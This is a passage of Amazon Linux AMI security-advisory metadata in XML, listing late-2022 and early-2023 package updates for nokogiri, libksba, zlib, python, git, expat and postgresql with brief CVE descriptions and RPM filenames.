</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29181" title="" id="CVE-2022-29181" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem22-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.23.amzn1.i686.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1649</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1649: important priority package update for libksba</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3515:
A vulnerability was found in the Libksba library due to an integer overflow within the CRL parser. The vulnerability can be exploited remotely for code execution on the target system by passing specially crafted data to the application, for example, a malicious S/MIME attachment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3515" title="" id="CVE-2022-3515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.5-1.10.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.5-1.10.amzn1.i686.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.5-1.10.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1650</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1650: medium priority package update for zlib</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37434:
A security vulnerability was found in zlib. The flaw triggered a heap-based buffer in inflate in the inflate.c function via a large gzip header extra field. This flaw is only applicable in the call inflateGetHeader.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434" title="" id="CVE-2022-37434" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="minizip" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-devel-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-debuginfo-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-static-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-devel-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="minizip" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-static-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-devel-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-devel-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-debuginfo-1.2.8-7.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1651</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1651: important priority package update for python38</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37454:
The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37454" title="" id="CVE-2022-37454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debug" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1652</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1652: important priority package update for python36</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37454:
The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37454" title="" id="CVE-2022-37454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1653</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1653: important priority package update for git</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-39260:
Git is an open source, scalable, distributed revision control system. git shell is a restricted login shell that can be used to implement Git's push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an int to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to execv(), it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to git shell as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling git shell access via remote logins is a viable short-term workaround.
CVE-2022-39253:
Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's /objects directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via --no-hardlinks). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the --recurse-submodules option. Git does not create symbolic links in the /objects directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the --local optimization when on a shared machine, either by passing the --no-local option to git clone or cloning from a URL that uses the file:// scheme. Alternatively, avoid cloning repositories from untrusted sources with --recurse-submodules or run git config --global protocol.file.allow user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39253" title="" id="CVE-2022-39253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39260" title="" id="CVE-2022-39260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-core" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.1-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1654</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1654: important priority package update for expat</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40674:
A vulnerability was found in expat. With this flaw, it is possible to create a situation in which parsing is suspended while substituting in an internal entity so that XML_ResumeParser directly uses the internalEntityProcessor as its processor. If the subsequent parse includes some unclosed tags, this will return without calling storeRawNames to ensure that the raw versions of the tag names are stored in memory other than the parse buffer itself. Issues occur if the parse buffer is changed or reallocated (for example, if processing a file line by line), problems occur. Using this vulnerability in the doContent function allows an attacker to triage a denial of service or potentially arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40674" title="" id="CVE-2022-40674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.32.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.32.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1655</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1655: important priority package update for expat</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-43680:
In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43680" title="" id="CVE-2022-43680" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.33.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.33.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1657</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1657: medium priority package update for postgresql92</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1658</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1658: medium priority package update for postgresql93</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" 